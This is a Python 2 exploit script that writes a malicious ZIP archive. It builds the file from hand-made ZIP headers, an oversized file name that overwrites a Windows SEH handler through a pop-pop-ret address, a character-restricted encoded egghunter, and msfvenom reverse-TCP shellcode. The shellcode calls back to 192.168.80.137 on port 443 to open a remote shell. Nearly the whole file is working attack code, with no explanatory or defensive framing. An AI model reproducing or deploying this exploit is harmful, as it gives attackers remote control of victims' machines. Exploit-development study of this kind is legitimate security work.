exploit.py

#!/usr/bin/env python

filename = "exploit.zip"

from struct import pack

def p(x): return pack('<L', x)

# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.80.137 LPORT=443 -f c -e x86/alpha_mixed
# The first line is to ensure the correct stack alignment
shellcode = (
"\x90" * 10 + "\x81\xE4\xF0\xFF\xFF\xFF"
"\x89\xe2\xdb\xc8\xd9\x72\xf4\x58\x50\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x59\x6c\x6d\x38\x4f\x72\x63\x30\x47\x70\x67\x70\x61\x70\x6f"
"\x79\x6b\x55\x36\x51\x4f\x30\x70\x64\x6c\x4b\x72\x70\x54\x70"
"\x6c\x4b\x46\x32\x44\x4c\x6e\x6b\x62\x72\x35\x44\x4c\x4b\x32"
"\x52\x36\x48\x64\x4f\x4d\x67\x72\x6a\x31\x36\x70\x31\x4b\x4f"
"\x4c\x6c\x37\x4c\x35\x31\x53\x4c\x77\x72\x74\x6c\x47\x50\x4a"
"\x61\x5a\x6f\x34\x4d\x55\x51\x59\x57\x78\x62\x49\x62\x50\x52"
"\x61\x47\x6c\x4b\x73\x62\x56\x70\x6e\x6b\x52\x6a\x57\x4c\x4c"
"\x4b\x52\x6c\x74\x51\x53\x48\x59\x73\x61\x58\x73\x31\x7a\x71"
"\x36\x31\x6c\x4b\x76\x39\x31\x30\x73\x31\x78\x53\x4e\x6b\x61"
"\x59\x57\x68\x49\x73\x46\x5a\x37\x39\x4e\x6b\x34\x74\x4e\x6b"
"\x76\x61\x58\x56\x64\x71\x49\x6f\x6e\x4c\x39\x51\x68\x4f\x54"
"\x4d\x47\x71\x6a\x67\x56\x58\x6d\x30\x61\x65\x78\x76\x53\x33"
"\x61\x6d\x49\x68\x77\x4b\x51\x6d\x64\x64\x34\x35\x58\x64\x36"
"\x38\x4e\x6b\x51\x48\x71\x34\x75\x51\x69\x43\x72\x46\x6e\x6b"
"\x36\x6c\x50\x4b\x6e\x6b\x72\x78\x65\x4c\x43\x31\x4b\x63\x4e"
"\x6b\x66\x64\x6e\x6b\x67\x71\x58\x50\x6b\x39\x37\x34\x56\x44"
"\x44\x64\x73\x6b\x51\x4b\x75\x31\x50\x59\x50\x5a\x50\x51\x39"
"\x6f\x39\x70\x31\x4f\x31\x4f\x73\x6a\x4c\x4b\x44\x52\x48\x6b"
"\x6e\x6d\x73\x6d\x30\x68\x47\x43\x45\x62\x73\x30\x63\x30\x61"
"\x78\x32\x57\x32\x53\x67\x42\x43\x6f\x36\x34\x61\x78\x52\x6c"
"\x62\x57\x55\x76\x36\x67\x59\x6f\x6e\x35\x6c\x78\x6a\x30\x35"
"\x51\x63\x30\x75\x50\x54\x69\x69\x54\x66\x34\x56\x30\x45\x38"
"\x71\x39\x4f\x70\x42\x4b\x73\x30\x79\x6f\x68\x55\x72\x70\x66"
"\x30\x66\x30\x42\x70\x77\x30\x76\x30\x77\x30\x30\x50\x31\x78"
"\x48\x6a\x54\x4f\x4b\x6f\x49\x70\x4b\x4f\x78\x55\x4a\x37\x30"
"\x6a\x66\x65\x62\x48\x4b\x70\x4e\x48\x36\x30\x4e\x69\x50\x68"
"\x33\x32\x45\x50\x56\x61\x4f\x4b\x4c\x49\x4a\x46\x31\x7a\x76"
"\x70\x32\x76\x42\x77\x51\x78\x4e\x79\x6e\x45\x31\x64\x45\x31"
"\x39\x6f\x78\x55\x6d\x55\x4f\x30\x52\x54\x76\x6c\x59\x6f\x30"
"\x4e\x44\x48\x51\x65\x5a\x4c\x71\x78\x58\x70\x6f\x45\x4f\x52"
"\x42\x76\x49\x6f\x79\x45\x62\x48\x62\x43\x70\x6d\x51\x74\x67"
"\x70\x4f\x79\x4d\x33\x63\x67\x42\x77\x63\x67\x66\x51\x49\x66"
"\x51\x7a\x44\x52\x31\x49\x61\x46\x4a\x42\x49\x6d\x72\x46\x4f"
"\x37\x43\x74\x57\x54\x65\x6c\x75\x51\x56\x61\x6c\x4d\x57\x34"
"\x57\x54\x62\x30\x38\x46\x73\x30\x72\x64\x73\x64\x46\x30\x76"
"\x36\x56\x36\x53\x66\x57\x36\x63\x66\x52\x6e\x72\x76\x32\x76"
"\x50\x53\x53\x66\x52\x48\x70\x79\x4a\x6c\x37\x4f\x4f\x76\x6b"
"\x4f\x48\x55\x4b\x39\x49\x70\x50\x4e\x52\x76\x52\x66\x6b\x4f"
"\x54\x70\x53\x58\x46\x68\x4c\x47\x57\x6d\x43\x50\x79\x6f\x7a"
"\x75\x4f\x4b\x4a\x50\x4d\x65\x6d\x72\x36\x36\x42\x48\x6c\x66"
"\x7a\x35\x4d\x6d\x4f\x6d\x79\x6f\x6a\x75\x75\x6c\x45\x56\x73"
"\x4c\x36\x6a\x6d\x50\x4b\x4b\x4d\x30\x73\x45\x44\x45\x6f\x4b"
"\x30\x47\x55\x43\x61\x62\x62\x4f\x71\x7a\x37\x70\x43\x63\x4b"
"\x4f\x6b\x65\x41\x41"
)

ldf_header = (
"\x50\x4B\x03\x04\x14\x00\x00"
"\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00"
"\xe4\x0f" # File size
"\x00\x00\x00"
)

cdf_header = (
"\x50\x4B\x01\x02\x14\x00\x14"
"\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\xe4\x0f" # File size
"\x00\x00\x00\x00\x00\x00\x01\x00"
"\x24\x00\x00\x00\x00\x00\x00\x00"
)

eofcdf_header = (
"\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00"
"\x12\x10\x00\x00" # Size of central directory (bytes)
"\x02\x10\x00\x00" # Offset of start of central directory, relative to start of archive
"\x00\x00"
)

# egghunter we are decoding: 
#"\x66\x81\xCA\xFF"
#"\x0F\x42\x52\x6A"
#"\x02\x58\xCD\x2e"
#"\x3C\x05\x5A\x74"
#"\xEF\xB8\x54\x30"
#"\x30\x57\x8B\xFA"
#"\xAF\x75\xEA\xAF"
#"\x75\xE7\xFF\xE7"

payload  = "D" * 48
payload += "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x54\x58" # 1
payload += "\x2d\x21\x55\x55\x55"
payload += "\x2d\x50\x55\x55\x55"
payload += "\x2d\x2d\x4f\x55\x55"
payload += "\x50"
payload += "\x5C\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x21\x55\x55\x55\x2D\x21\x54\x55\x55\x2D\x49\x6F\x55\x6D\x50" # 2
payload += "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x71\x21\x61\x75\x2D\x71\x21\x61\x75\x2D\x6F\x47\x53\x65\x50" # 3
print len(payload), '[max:' + str(130) + ']'
payload += "C" * (130 - len(payload))

payload += "\x74\xaa" # third jump left
payload += "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x44\x41\x7E\x58\x2D\x44\x34\x7E\x58\x2D\x48\x33\x78\x54\x50" # 4
payload += "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x71\x7A\x31\x45\x2D\x31\x7A\x31\x45\x2D\x6F\x52\x48\x45\x50" # 5
payload += "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x33\x73\x31\x2D\x2D\x33\x33\x31\x2D\x2D\x5E\x54\x43\x31\x50" # 6
print len(payload), '[max:' + str(212) + ']'
payload += "B" * (212 - len(payload))

payload += "\x74\xaa" # second jump left
payload += "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x45\x31\x77\x45\x2D\x45\x31\x47\x45\x2D\x74\x45\x74\x46\x50" # 7
payload += "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x52\x32\x32\x32\x2D\x31\x31\x31\x31\x2D\x6E\x5A\x4A\x32\x50" # 8
payload += "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x31\x2D\x77\x44\x2D\x31\x2D\x77\x44\x2D\x38\x24\x47\x77\x50" # 9
print len(payload), '[max:' + str(294) + ']'
payload += "A" * (294 - len(payload))

payload += "\x74\xaaXX"  # NEXT SEH, will be 74 AC after mangling
payload += p(0x0040322B) # SEH -> pop pop ret
payload += "T00WT00W" + shellcode
payload += "\x42" * (4064-len(payload))
payload += ".txt"

print "Payload size:", len(payload)

f = open(filename, "wb")
f.write(ldf_header + payload + cdf_header + payload + eofcdf_header)
f.close()